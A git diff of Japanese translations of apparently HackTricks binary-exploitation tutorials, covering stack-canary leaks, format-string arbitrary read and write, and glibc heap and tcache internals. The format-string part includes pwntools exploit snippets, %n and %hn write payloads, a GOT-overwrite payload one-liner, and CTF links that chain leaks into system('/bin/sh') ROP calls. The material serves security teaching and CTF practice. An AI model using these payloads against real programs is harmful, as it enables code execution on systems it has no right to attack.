+スタックオーバーフローに**脆弱なプログラム**が**スタックオーバーフロー**の**一部**を指す**puts**関数を実行できる状況を想像してください。攻撃者は**カナリアの最初のバイトがヌルバイト**(`\x00`)であり、残りのカナリアは**ランダム**なバイトであることを知っています。次に、攻撃者は**カナリアの最初のバイト**までスタックを**上書きする**オーバーフローを作成することができます。 その後、攻撃者はペイロードの中間で**puts機能**を呼び出し、**カナリアのすべて**を**印刷**します(最初のヌルバイトを除く)。 この情報を使って、攻撃者は**カナリア**を知っている状態で**新しい攻撃を作成して送信**することができます(同じプログラムセッション内で)。 -明らかに、この戦術は非常に**制限されて**おり、攻撃者は**ペイロードの内容**を**印刷**して**カナリアを抽出**し、その後**新しいペイロード**を作成して(**同じプログラムセッション内で**)**実際のバッファオーバーフローを送信**する必要があります。 +明らかに、この戦術は非常に**制限されて**おり、攻撃者は**ペイロードの内容**を**印刷**して**カナリアを抽出**し、その後**新しいペイロード**を作成して(**同じプログラムセッション内で**)**本物のバッファオーバーフローを送信**する必要があります。 **CTFの例:** - [**https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html**](https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html) -- 64ビット、ASLRが有効ですがPIEはなし、最初のステップはカナリアのバイト0x00までオーバーフローを埋めてからputsを呼び出して漏洩させることです。カナリアを使ってROPガジェットを作成し、putsを呼び出してGOTからputsのアドレスを漏洩させ、次に`system('/bin/sh')`を呼び出すROPガジェットを作成します。 +- 64ビット、ASLRが有効だがPIEなし、最初のステップはカナリアのバイト0x00までオーバーフローを埋めてからputsを呼び出して漏洩させることです。カナリアを使ってROPガジェットを作成し、putsを呼び出してGOTからputsのアドレスを漏洩させ、次に`system('/bin/sh')`を呼び出すROPガジェットを作成します。 - [**https://guyinatuxedo.github.io/14-ret_2_system/hxp18_poorCanary/index.html**](https://guyinatuxedo.github.io/14-ret_2_system/hxp18_poorCanary/index.html) - 32ビット、ARM、relroなし、カナリア、nx、pieなし。カナリアを漏洩させるためにputsを呼び出すオーバーフロー + ROPチェーンで`system`を呼び出すためにr0(引数`/bin/sh`)とpc(systemのアドレス)をポップします。 ## Arbitrary Read -フォーマット**文字列**によって提供される**任意の読み取り**を使用すると、カナリアを漏洩させることができるかもしれません。この例を確認してください: [**https://ir0nstone.gitbook.io/notes/types/stack/canaries**](https://ir0nstone.gitbook.io/notes/types/stack/canaries) そして、任意のメモリアドレスを読み取るためにフォーマット文字列を悪用することについては: +フォーマット**文字列**によって提供される**任意の読み取り**を使用すると、カナリアを漏洩させることができるかもしれません。この例を確認してください: [**https://ir0nstone.gitbook.io/notes/types/stack/canaries**](https://ir0nstone.gitbook.io/notes/types/stack/canaries) そして、任意のメモリアドレスを読み取るためにフォーマット文字列を悪用することについて読むことができます: + {{#ref}} ../../format-strings/ diff --git a/src/binary-exploitation/format-strings/README.md b/src/binary-exploitation/format-strings/README.md index 8fc9c799d..5367cdbce 100644 --- a/src/binary-exploitation/format-strings/README.md +++ b/src/binary-exploitation/format-strings/README.md @@ -4,11 +4,11 @@ ## 基本情報 -Cの**`printf`**は、いくつかの文字列を**出力**するために使用できる関数です。この関数が期待する**最初のパラメータ**は、**フォーマッタを含む生のテキスト**です。続く**パラメータ**は、**生のテキストからフォーマッタを置き換えるための**値**です。 +Cの**`printf`**は、いくつかの文字列を**出力**するために使用できる関数です。この関数が期待する**最初のパラメータ**は、**フォーマッタを含む生のテキスト**です。**次のパラメータ**として期待されるのは、**生のテキストからフォーマッタを**置き換えるための**値**です。 他の脆弱な関数には**`sprintf()`**や**`fprintf()`**があります。 -脆弱性は、**攻撃者のテキストがこの関数の最初の引数として使用されるとき**に現れます。攻撃者は、**printfフォーマット**文字列の機能を悪用して、**任意のアドレス(読み取り可能/書き込み可能)にある任意のデータを読み書き**するための**特別な入力を作成**することができます。この方法で**任意のコードを実行**することが可能です。 +脆弱性は、**攻撃者のテキストがこの関数の最初の引数として使用されるとき**に現れます。攻撃者は、**printfフォーマット**文字列の機能を悪用して、**任意のアドレス(読み取り可能/書き込み可能)にある任意のデータを読み書きする**ための**特別な入力を作成**することができます。この方法で**任意のコードを実行**することが可能になります。 #### フォーマッタ: ```bash @@ -59,20 +59,20 @@ printf("%x %x %x %x") ``` 最初のパラメータから4番目のパラメータまで読み取ります。 -または、次のようにできます: +または、次のようにできます: ```c printf("%4$x") ``` -そして4番目を直接読み取ります。 +and read directly the forth. -攻撃者が`printf`の**パラメータを制御していることに注意してください。これは基本的に**、`printf`が呼び出されるときに彼の入力がスタックに存在することを意味し、特定のメモリアドレスをスタックに書き込むことができるということです。 +攻撃者は `printf` **パラメータを制御しており、これは基本的に** 彼の入力が `printf` が呼び出されるときにスタックに存在することを意味します。つまり、彼はスタックに特定のメモリアドレスを書き込むことができます。 > [!CAUTION] -> この入力を制御する攻撃者は、**スタックに任意のアドレスを追加し、`printf`がそれにアクセスできるようにします**。次のセクションでは、この動作をどのように利用するかが説明されます。 +> この入力を制御する攻撃者は、**スタックに任意のアドレスを追加し、`printf` にそれらにアクセスさせることができます**。次のセクションでは、この動作をどのように利用するかが説明されます。 ## **任意の読み取り** -フォーマッタ**`%n$s`**を使用して、**`printf`**が**n位置**にある**アドレス**を取得し、それを**文字列のように印刷する**ことが可能です(0x00が見つかるまで印刷します)。したがって、バイナリのベースアドレスが**`0x8048000`**であり、ユーザー入力がスタックの4番目の位置から始まることがわかっている場合、次のようにバイナリの先頭を印刷することができます: +フォーマッタ **`%n$s`** を使用して、**`printf`** が **n 番目の位置** にある **アドレス** を取得し、それを**文字列のように印刷する**ことが可能です(0x00 が見つかるまで印刷します)。したがって、バイナリのベースアドレスが **`0x8048000`** であり、ユーザー入力がスタックの4番目の位置から始まることがわかっている場合、次のようにバイナリの先頭を印刷することができます: ```python from pwn import * @@ -86,11 +86,11 @@ p.sendline(payload) log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||' ``` > [!CAUTION] -> 入力の最初にアドレス0x8048000を置くことはできません。なぜなら、そのアドレスの末尾に0x00が付加されるからです。 +> 入力の最初にアドレス0x8048000を置くことはできません。なぜなら、そのアドレスの最後に0x00で文字列が切られるからです。 ### オフセットを見つける -入力のオフセットを見つけるために、4または8バイト(`0x41414141`)を送信し、その後に**`%1$x`**を続けて、`A`を取得するまで**値を増加**させます。 +入力のオフセットを見つけるために、4または8バイト(`0x41414141`)を送信し、その後に**`%1$x`**を続けて、`A`の値を取得するまで**増加**させます。
@@ -127,42 +127,42 @@ p.close() ### どれほど役立つか -任意の読み取りは以下に役立ちます: +任意の読み取りは以下の目的に役立ちます: - **メモリから** **バイナリ**を**ダンプ**する - **機密情報が保存されているメモリの特定の部分にアクセスする**(カナリア、暗号化キー、またはこの[**CTFチャレンジ**](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak#read-arbitrary-value)のようなカスタムパスワードなど) ## **任意の書き込み** -フォーマッタ **`%$n`** は、スタックの\パラメータにおいて**指定されたアドレス**に**書き込まれたバイト数**を**書き込みます**。攻撃者がprintfを使って任意の数の文字を書き込むことができれば、**`%$n`** を使って任意のアドレスに任意の数を**書き込む**ことができるようになります。 +フォーマッタ **`%$n`** は、スタック内の\パラメータで指定されたアドレスに**書き込まれたバイト数**を**書き込みます**。攻撃者がprintfを使って任意の数の文字を書き込むことができれば、**`%$n`** を使って任意のアドレスに任意の数を記録することができます。 -幸いなことに、9999という数を書くために、入力に9999個の"A"を追加する必要はなく、フォーマッタ **`%.%$n`** を使用して、**``**という数を**`num`位置が指すアドレスに書き込む**ことが可能です。 +幸いなことに、9999という数を書くために、入力に9999個の"A"を追加する必要はありません。そのため、フォーマッタ **`%.%$n`** を使用して、**``** の数を**`num`位置で指し示されるアドレスに書き込む**ことが可能です。 ```bash AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param AAAA.%500\$08x —> Param at offset 500 ``` -ただし、通常、`0x08049724`のようなアドレスを書くためには(これは一度に書くには非常に大きな数です)、**`$hn`**が**`$n`**の代わりに使用されます。これにより、**2バイトだけを書く**ことができます。したがって、この操作は2回行われ、アドレスの最上位2バイトと最下位2バイトのそれぞれに対して行われます。 +しかし、通常、`0x08049724`のようなアドレスを書くためには(これは一度に書くには非常に大きな数です)、**`$hn`**が使用されます。これにより、**2バイトだけを書く**ことができます。したがって、この操作は2回行われ、アドレスの最上位2バイトと最下位2バイトのそれぞれに対して行われます。 したがって、この脆弱性は**任意のアドレスに何でも書き込むことを可能にします(任意書き込み)。** -この例では、目標は**後で呼び出される**関数の**アドレス**を**上書き**することです。これは他の任意書き込みからexec技術を悪用する可能性があります: +この例では、目標は**関数**の**アドレス**を**上書き**することです。この関数は後で呼び出される**GOT**テーブルにあります。これは他の任意書き込みからexec技術を悪用する可能性があります: {{#ref}} ../arbitrary-write-2-exec/ {{#endref}} 私たちは、**ユーザー**から**引数**を**受け取る**関数を**上書き**し、それを**`system`**関数に**ポイント**します。\ -前述のように、アドレスを書くには通常2ステップが必要です:最初にアドレスの2バイトを書き、その後に残りの2バイトを書きます。そのために**`$hn`**が使用されます。 +前述のように、アドレスを書くためには通常2ステップが必要です:最初にアドレスの2バイトを書き、その後に残りの2バイトを書きます。そのために**`$hn`**が使用されます。 - **HOB**はアドレスの上位2バイトに呼び出されます - **LOB**はアドレスの下位2バイトに呼び出されます -次に、フォーマット文字列の動作のために、最初に\[HOB, LOB\]の中で最小のものを**書く必要があります**、その後にもう一方を書きます。 +次に、フォーマット文字列の動作のために、最初に\[HOB, LOB\]の中で最小のものを**書く必要があります**。次にもう一方を書きます。 -HOB < LOB\ +HOB < LOBの場合\ `[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]` -HOB > LOB\ +HOB > LOBの場合\ `[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]` HOB LOB HOB_shellcode-8 NºParam_dir_HOB LOB_shell-HOB_shell NºParam_dir_LOB @@ -173,11 +173,12 @@ python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + " この種の脆弱性に対するエクスプロイトを準備するための**テンプレート**は次の場所にあります: + {{#ref}} format-strings-template.md {{#endref}} -または、[**こちら**](https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite)の基本的な例を参照してください: +または、[**こちら**](https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite)の基本的な例です: ```python from pwn import * @@ -198,7 +199,7 @@ p.interactive() ``` ## フォーマット文字列からBOFへ -フォーマット文字列の脆弱性の書き込みアクションを悪用して、**スタックのアドレスに書き込む**ことが可能であり、**バッファオーバーフロー**タイプの脆弱性を悪用することができます。 +フォーマット文字列の脆弱性の書き込みアクションを悪用して、**スタックのアドレスに書き込む**ことが可能で、**バッファオーバーフロー**タイプの脆弱性を悪用することができます。 ## その他の例と参考文献 @@ -208,7 +209,7 @@ p.interactive() - [https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html](https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html) - 32ビット、relroなし、canaryなし、nx、pieなし、スタックからフラグを漏洩させるためのフォーマット文字列の基本的な使用(実行フローを変更する必要はありません) - [https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html](https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html) -- 32ビット、relroあり、canaryなし、nx、pieなし、`fflush`のアドレスをwin関数で上書きするためのフォーマット文字列(ret2win) +- 32ビット、relroあり、canaryなし、nx、pieなし、`fflush`のアドレスをwin関数(ret2win)で上書きするためのフォーマット文字列 - [https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html](https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html) - 32ビット、relroあり、canaryなし、nx、pieなし、`.fini_array`内のmainのアドレスに書き込むためのフォーマット文字列(フローがもう1回ループバックするように)および`system`のアドレスをGOTテーブルに書き込み、`strlen`を指す。フローがmainに戻ると、`strlen`がユーザー入力で実行され、`system`を指すと、渡されたコマンドが実行されます。 diff --git a/src/binary-exploitation/libc-heap/README.md b/src/binary-exploitation/libc-heap/README.md index 9dd3d3477..1c5274b61 100644 --- a/src/binary-exploitation/libc-heap/README.md +++ b/src/binary-exploitation/libc-heap/README.md @@ -12,7 +12,7 @@ ### Basic Chunk Allocation -ヒープにデータを保存するために要求されると、ヒープの一部がそのために割り当てられます。このスペースはビンに属し、要求されたデータ + ビンヘッダーのスペース + 最小ビンサイズオフセットの分だけがチャンクのために予約されます。目標は、各チャンクの位置を見つけるのを複雑にせず、できるだけ少ないメモリを予約することです。このために、メタデータチャンク情報が使用され、使用中/未使用のチャンクの位置を把握します。 +ヒープにデータを保存するために要求されると、ヒープの一部がそのために割り当てられます。このスペースはビンに属し、要求されたデータ + ビンヘッダーのスペース + 最小ビンサイズオフセットの分だけがチャンクのために予約されます。目標は、各チャンクの位置を見つけるのを複雑にしないように、できるだけ少ないメモリを予約することです。このために、メタデータチャンク情報を使用して、各使用中/未使用のチャンクの位置を把握します。 スペースを予約する方法はいくつかありますが、主に使用されるビンによって異なりますが、一般的な方法論は次のとおりです: @@ -31,7 +31,7 @@ これに対処するために、ptmalloc2ヒープアロケータは「アリーナ」を導入しました。ここで**各アリーナ**は**独自の**データ**構造**と**ミューテックス**を持つ**別々のヒープ**として機能し、異なるアリーナを使用する限り、複数のスレッドが互いに干渉することなくヒープ操作を実行できます。 -デフォルトの「メイン」アリーナは、シングルスレッドアプリケーションのヒープ操作を処理します。**新しいスレッド**が追加されると、ヒープマネージャーは競合を減らすために**セカンダリアリーナ**を割り当てます。最初に、各新しいスレッドを未使用のアリーナに接続しようとし、必要に応じて新しいものを作成します。32ビットシステムではCPUコア数の2倍、64ビットシステムでは8倍までの制限があります。制限に達すると、**スレッドはアリーナを共有しなければならず**、競合が発生する可能性があります。 +デフォルトの「メイン」アリーナは、シングルスレッドアプリケーションのヒープ操作を処理します。**新しいスレッド**が追加されると、ヒープマネージャーは競合を減らすために**セカンダリアリーナ**を割り当てます。最初に、各新しいスレッドを未使用のアリーナに接続しようとし、必要に応じて新しいものを作成します。これは、32ビットシステムの場合はCPUコア数の2倍、64ビットシステムの場合は8倍までの制限があります。制限に達すると、**スレッドはアリーナを共有しなければならず**、競合の可能性が生じます。 メインアリーナとは異なり、`brk`システムコールを使用して拡張されるメインアリーナに対し、セカンダリアリーナは`mmap`と`mprotect`を使用して「サブヒープ」を作成し、ヒープの動作をシミュレートし、マルチスレッド操作のためのメモリ管理の柔軟性を提供します。 @@ -39,12 +39,12 @@ サブヒープは、マルチスレッドアプリケーションにおけるセカンダリアリーナのメモリ予備として機能し、メインヒープとは別に自分自身のヒープ領域を成長させ、管理できるようにします。サブヒープが初期ヒープとどのように異なり、どのように機能するかは次のとおりです: -1. **初期ヒープ vs. サブヒープ**: +1. **初期ヒープとサブヒープ**: - 初期ヒープはプログラムのバイナリの直後にメモリに位置し、`sbrk`システムコールを使用して拡張されます。 - セカンダリアリーナによって使用されるサブヒープは、指定されたメモリ領域をマッピングするシステムコールである`mmap`を通じて作成されます。 2. **`mmap`によるメモリ予約**: -- ヒープマネージャーがサブヒープを作成するとき、大きなメモリブロックを`mmap`を通じて予約します。この予約は即座にメモリを割り当てるわけではなく、他のシステムプロセスや割り当てが使用すべきでない領域を指定するだけです。 -- デフォルトでは、サブヒープの予約サイズは32ビットプロセスで1MB、64ビットプロセスで64MBです。 +- ヒープマネージャーがサブヒープを作成するとき、大きなメモリブロックを`mmap`を通じて予約します。この予約は即座にメモリを割り当てるわけではなく、他のシステムプロセスや割り当てが使用しないべき領域を指定するだけです。 +- デフォルトでは、サブヒープの予約サイズは32ビットプロセスの場合は1MB、64ビットプロセスの場合は64MBです。 3. **`mprotect`による段階的拡張**: - 予約されたメモリ領域は最初に`PROT_NONE`としてマークされ、カーネルがこのスペースに物理メモリを割り当てる必要がないことを示します。 - サブヒープを「成長させる」ために、ヒープマネージャーは`mprotect`を使用してページの権限を`PROT_NONE`から`PROT_READ | PROT_WRITE`に変更し、カーネルに以前に予約されたアドレスに物理メモリを割り当てるように促します。この段階的アプローチにより、サブヒープは必要に応じて拡張できます。 @@ -52,7 +52,7 @@ ### heap_info -この構造体はヒープの関連情報を割り当てます。さらに、ヒープメモリは追加の割り当ての後に連続していない場合があるため、この構造体はその情報も保存します。 +この構造体はヒープの関連情報を割り当てます。さらに、ヒープメモリは追加の割り当ての後に連続していない場合があり、この構造体はその情報も保存します。 ```c // From https://github.com/bminor/glibc/blob/a07e000e82cb71238259e674529c37c12dc7d423/malloc/arena.c#L837 @@ -74,11 +74,11 @@ char pad[-3 * SIZE_SZ & MALLOC_ALIGN_MASK]; **各ヒープ**(メインアリーナまたは他のスレッドアリーナ)には**`malloc_state`構造体があります。**\ **メインアリーナの`malloc_state`**構造体は**libcのグローバル変数**であることに注意することが重要です(したがって、libcのメモリ空間にあります)。\ -スレッドのヒープの**`malloc_state`**構造体は、**各スレッドの「ヒープ」の内部**にあります。 +スレッドのヒープの**`malloc_state`**構造体は、**各スレッドの「ヒープ」内にあります**。 この構造体から注目すべき興味深い点がいくつかあります(以下のCコードを参照): -- `__libc_lock_define (, mutex);` は、このヒープの構造体が1つのスレッドによってのみアクセスされることを保証するためにあります。 +- `__libc_lock_define (, mutex);` は、このヒープの構造体が1つのスレッドによって同時にアクセスされることを保証するためにあります。 - フラグ: - ```c @@ -90,11 +90,11 @@ char pad[-3 * SIZE_SZ & MALLOC_ALIGN_MASK]; #define set_contiguous(M) ((M)->flags &= ~NONCONTIGUOUS_BIT) ``` -- `mchunkptr bins[NBINS * 2 - 2];` は**小さな、大きな、未ソートの** **ビン**の**最初と最後のチャンク**への**ポインタ**を含みます(-2はインデックス0が使用されていないためです)。 -- したがって、これらのビンの**最初のチャンク**はこの構造体への**逆ポインタ**を持ち、これらのビンの**最後のチャンク**はこの構造体への**前方ポインタ**を持ちます。基本的に、もしあなたが**メインアリーナでこれらのアドレスを漏洩させることができれば**、あなたは**libc**内の構造体へのポインタを持つことになります。 +- `mchunkptr bins[NBINS * 2 - 2];` は**小さな、大きな、未ソートの** **ビン**の**最初と最後のチャンク**への**ポインタ**を含んでいます(-2はインデックス0が使用されていないためです)。 +- したがって、これらのビンの**最初のチャンク**はこの構造体への**逆ポインタ**を持ち、これらのビンの**最後のチャンク**はこの構造体への**前方ポインタ**を持ちます。基本的に、**メインアリーナでこれらのアドレスをl**eakできれば、**libc**内の構造体へのポインタを得ることができます。 - 構造体`struct malloc_state *next;`と`struct malloc_state *next_free;`はアリーナのリンクリストです。 -- `top`チャンクは最後の「チャンク」であり、基本的に**ヒープの残りのすべての空間**です。トップチャンクが「空」であるとき、ヒープは完全に使用されており、さらにスペースを要求する必要があります。 -- `last reminder`チャンクは、正確なサイズのチャンクが利用できない場合に大きなチャンクが分割され、残りの部分のポインタがここに置かれるケースから来ます。 +- `top`チャンクは最後の「チャンク」であり、基本的に**ヒープの残りのすべてのスペース**です。トップチャンクが「空」になると、ヒープは完全に使用され、さらにスペースを要求する必要があります。 +- `last reminder`チャンクは、正確なサイズのチャンクが利用できない場合に大きなチャンクが分割され、残りの部分のポインタがここに置かれるケースから来ています。 ```c // From https://github.com/bminor/glibc/blob/a07e000e82cb71238259e674529c37c12dc7d423/malloc/malloc.c#L1812 @@ -159,7 +159,7 @@ struct malloc_chunk* bk_nextsize; typedef struct malloc_chunk* mchunkptr; ``` -前述のように、これらのチャンクにはメタデータも含まれており、以下の画像で非常に良く表現されています: +以前にコメントしたように、これらのチャンクにはメタデータも含まれており、以下の画像で非常に良く表現されています:

https://azeria-labs.com/wp-content/uploads/2019/03/chunk-allocated-CS.png

@@ -171,21 +171,21 @@ typedef struct malloc_chunk* mchunkptr; 次に、ユーザーデータのためのスペースがあり、最後にチャンクが利用可能なときに前のチャンクサイズを示すための0x08B(または割り当てられたときにユーザーデータを格納するためのもの)があります。 -さらに、利用可能な場合、ユーザーデータは以下のデータを含むためにも使用されます: +さらに、利用可能な場合、ユーザーデータは次のデータを含むためにも使用されます: - **`fd`**: 次のチャンクへのポインタ - **`bk`**: 前のチャンクへのポインタ -- **`fd_nextsize`**: 自身より小さいリスト内の最初のチャンクへのポインタ -- **`bk_nextsize`:** 自身より大きいリスト内の最初のチャンクへのポインタ +- **`fd_nextsize`**: リスト内で自分より小さい最初のチャンクへのポインタ +- **`bk_nextsize`:** リスト内で自分より大きい最初のチャンクへのポインタ

https://azeria-labs.com/wp-content/uploads/2019/03/chunk-allocated-CS.png

> [!TIP] -> このようにリストをリンクすることで、すべてのチャンクが登録されている配列を持つ必要がなくなることに注意してください。 +> このようにリストをリンクすることで、すべてのチャンクが登録されている配列を持つ必要がなくなります。 ### チャンクポインタ -mallocが使用されると、書き込むことができるコンテンツへのポインタが返されます(ヘッダーの直後)。ただし、チャンクを管理する際には、ヘッダー(メタデータ)の先頭へのポインタが必要です。\ +mallocが使用されると、書き込むことができるコンテンツへのポインタが返されます(ヘッダーのすぐ後)。ただし、チャンクを管理する際には、ヘッダー(メタデータ)の先頭へのポインタが必要です。\ これらの変換には次の関数が使用されます: ```c // https://github.com/bminor/glibc/blob/master/malloc/malloc.c @@ -411,11 +411,11 @@ ptr = malloc(0x10); strcpy(ptr, "panda"); } ``` -メイン関数の終わりにブレークポイントを設定し、情報がどこに保存されているかを確認しましょう: +メイン関数の終わりにブレークポイントを設定し、情報がどこに保存されたかを確認しましょう:
-文字列pandaが`0xaaaaaaac12a0`に保存されていることがわかります(これは`x0`内のmallocからの応答として与えられたアドレスです)。0x10バイト前を確認すると、`0x0`は**前のチャンクが使用されていない**こと(長さ0)を示し、このチャンクの長さは`0x21`です。 +文字列pandaが`0xaaaaaaac12a0`に保存されていることがわかります(これは`x0`内のmallocからの応答として与えられたアドレスです)。0x10バイト前を確認すると、`0x0`が**前のチャンクが使用されていない**(長さ0)ことを示し、このチャンクの長さが`0x21`であることがわかります。 予約された余分なスペース(0x21-0x10=0x11)は**追加ヘッダー**(0x10)から来ており、0x1は0x21Bが予約されたことを意味するのではなく、現在のヘッダーの長さの最後の3ビットには特別な意味があります。長さは常に16バイト境界に揃えられているため(64ビットマシンで)、これらのビットは実際には長さの数値によって使用されることはありません。 ``` @@ -483,7 +483,7 @@ return 0;
-## Bins & Memory Allocations/Frees +## ビンとメモリの割り当て/解放 ビンが何であり、どのように整理され、メモリがどのように割り当てられ、解放されるかを確認してください: @@ -491,15 +491,15 @@ return 0; bins-and-memory-allocations.md {{#endref}} -## Heap Functions Security Checks +## ヒープ関数のセキュリティチェック -ヒープに関与する関数は、ヒープが破損していないことを確認するために、アクションを実行する前に特定のチェックを行います: +ヒープに関与する関数は、アクションを実行する前に特定のチェックを行い、ヒープが破損していないことを確認しようとします: {{#ref}} heap-memory-functions/heap-functions-security-checks.md {{#endref}} -## References +## 参考文献 - [https://azeria-labs.com/heap-exploitation-part-1-understanding-the-glibc-heap-implementation/](https://azeria-labs.com/heap-exploitation-part-1-understanding-the-glibc-heap-implementation/) - [https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/](https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/) diff --git a/src/binary-exploitation/libc-heap/bins-and-memory-allocations.md b/src/binary-exploitation/libc-heap/bins-and-memory-allocations.md index 76723e1e1..f8b6584fb 100644 --- a/src/binary-exploitation/libc-heap/bins-and-memory-allocations.md +++ b/src/binary-exploitation/libc-heap/bins-and-memory-allocations.md @@ -4,20 +4,20 @@ ## 基本情報 -チャンクの保存効率を向上させるために、各チャンクは単一のリンクリストにだけ存在するのではなく、いくつかのタイプがあります。これらはビンと呼ばれ、5種類のビンがあります: [62](https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=blob;f=malloc/malloc.c;h=6e766d11bc85b6480fa5c9f2a76559f8acf9deb5;hb=HEAD#l1407) 小ビン、63 大ビン、1 未整理ビン、10 ファストビン、64 tcacheビン(スレッドごと)。 +チャンクの保存効率を向上させるために、各チャンクは単一のリンクリストにだけ存在するのではなく、いくつかのタイプがあります。これがビンであり、5種類のビンがあります: [62](https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=blob;f=malloc/malloc.c;h=6e766d11bc85b6480fa5c9f2a76559f8acf9deb5;hb=HEAD#l1407) 小ビン、63 大ビン、1 未整理ビン、10 高速ビン、スレッドごとに64 tcacheビンです。 未整理、小ビン、大ビンの各ビンへの初期アドレスは同じ配列内にあります。インデックス0は未使用、1は未整理ビン、ビン2-64は小ビン、ビン65-127は大ビンです。 -### Tcache(スレッドごとのキャッシュ)ビン +### Tcache (スレッドごとのキャッシュ) ビン -スレッドはそれぞれ独自のヒープを持とうとしますが([アリーナ](bins-and-memory-allocations.md#arenas)および[サブヒープ](bins-and-memory-allocations.md#subheaps)を参照)、多くのスレッドを持つプロセス(ウェブサーバーなど)が**他のスレッドとヒープを共有する可能性があります**。この場合、主な解決策は**ロッカー**の使用であり、これにより**スレッドが大幅に遅くなる可能性があります**。 +スレッドはそれぞれ独自のヒープを持とうとしますが([アリーナ](bins-and-memory-allocations.md#arenas)および[サブヒープ](bins-and-memory-allocations.md#subheaps)を参照)、多くのスレッドを持つプロセス(ウェブサーバーのような)は**他のスレッドとヒープを共有する可能性があります**。この場合、主な解決策は**ロッカー**の使用であり、これにより**スレッドが大幅に遅くなる可能性があります**。 -したがって、tcacheはスレッドごとのファストビンに似ており、**チャンクをマージしない単一のリンクリスト**です。各スレッドには**64の単一リンクtcacheビン**があります。各ビンは、[64ビットシステムで24から1032B、32ビットシステムで12から516Bの範囲の](https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=2527e2504761744df2bdb1abdc02d936ff907ad2;hb=d5c3fafc4307c9b7a4c7d5cb381fcdbfad340bcc#l315) [同サイズのチャンクを最大7つ](https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=2527e2504761744df2bdb1abdc02d936ff907ad2;hb=d5c3fafc4307c9b7a4c7d5cb381fcdbfad340bcc#l323)持つことができます。 +したがって、tcacheはスレッドごとの高速ビンに似ており、**チャンクをマージしない単一のリンクリスト**です。各スレッドには**64の単一リンクtcacheビン**があります。各ビンは、[64ビットシステムで24から1032B、32ビットシステムで12から516Bの範囲の](https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=2527e2504761744df2bdb1abdc02d936ff907ad2;hb=d5c3fafc4307c9b7a4c7d5cb381fcdbfad340bcc#l315) [同サイズのチャンクを最大7つ](https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=2527e2504761744df2bdb1abdc02d936ff907ad2;hb=d5c3fafc4307c9b7a4c7d5cb381fcdbfad340bcc#l323)持つことができます。 -**スレッドがチャンクを解放するとき**、**tcacheに割り当てるには大きすぎない場合**、かつ該当するtcacheビンが**満杯でない**(すでに7つのチャンクがある)場合、**そこに割り当てられます**。tcacheに行けない場合は、グローバルに解放操作を実行するためにヒープロックを待つ必要があります。 +**スレッドが**チャンクを解放するとき、**tcacheに割り当てるには大きすぎない場合**、および該当するtcacheビンが**満杯でない場合**(すでに7つのチャンクがある場合)、**そこに割り当てられます**。tcacheに行けない場合、グローバルに解放操作を実行するためにヒープロックを待つ必要があります。 -**チャンクが割り当てられるとき**、必要なサイズのフリーなチャンクが**Tcacheにあればそれを使用し**、なければ、グローバルビンで見つけるか新しいものを作成するためにヒープロックを待つ必要があります。\ -また、最適化もあり、この場合、ヒープロックを保持している間、スレッドは**要求されたサイズのヒープチャンク(7)でTcacheを満たします**。そのため、さらに必要な場合は、Tcache内で見つけることができます。 +**チャンクが割り当てられるとき**、必要なサイズの空きチャンクが**Tcacheにあればそれを使用し**、そうでなければ、グローバルビンで見つけるか新しいものを作成するためにヒープロックを待つ必要があります。\ +また、最適化もあり、この場合、ヒープロックを保持している間、スレッドは**要求されたサイズのヒープチャンク(7)でTcacheを満たします**ので、さらに必要な場合はTcacheで見つけることができます。
@@ -36,7 +36,7 @@ free(chunk); return 0; } ``` -コンパイルして、main関数のretオペコードにブレークポイントを設定してデバッグします。次に、gefを使用すると、使用中のtcache binを見ることができます: +コンパイルして、main関数のretオペコードにブレークポイントを設定します。次に、gefを使用すると、使用中のtcache binを見ることができます: ```bash gef➤ heap bins ──────────────────────────────────────────────────────────────────────────────── Tcachebins for thread 1 ──────────────────────────────────────────────────────────────────────────────── @@ -46,7 +46,7 @@ Tcachebins[idx=0, size=0x20, count=1] ← Chunk(addr=0xaaaaaaac12a0, size=0x20, #### Tcache 構造体と関数 -以下のコードでは、**max bins** と **chunks per index**、ダブルフリーを避けるために作成された **`tcache_entry`** 構造体、各スレッドがビンの各インデックスへのアドレスを格納するために使用する構造体 **`tcache_perthread_struct`** を見ることができます。 +以下のコードでは、**max bins** と **chunks per index**、ダブルフリーを避けるために作成された **`tcache_entry`** 構造体、各スレッドがビンの各インデックスへのアドレスを格納するために使用する **`tcache_perthread_struct`** 構造体を見ることができます。
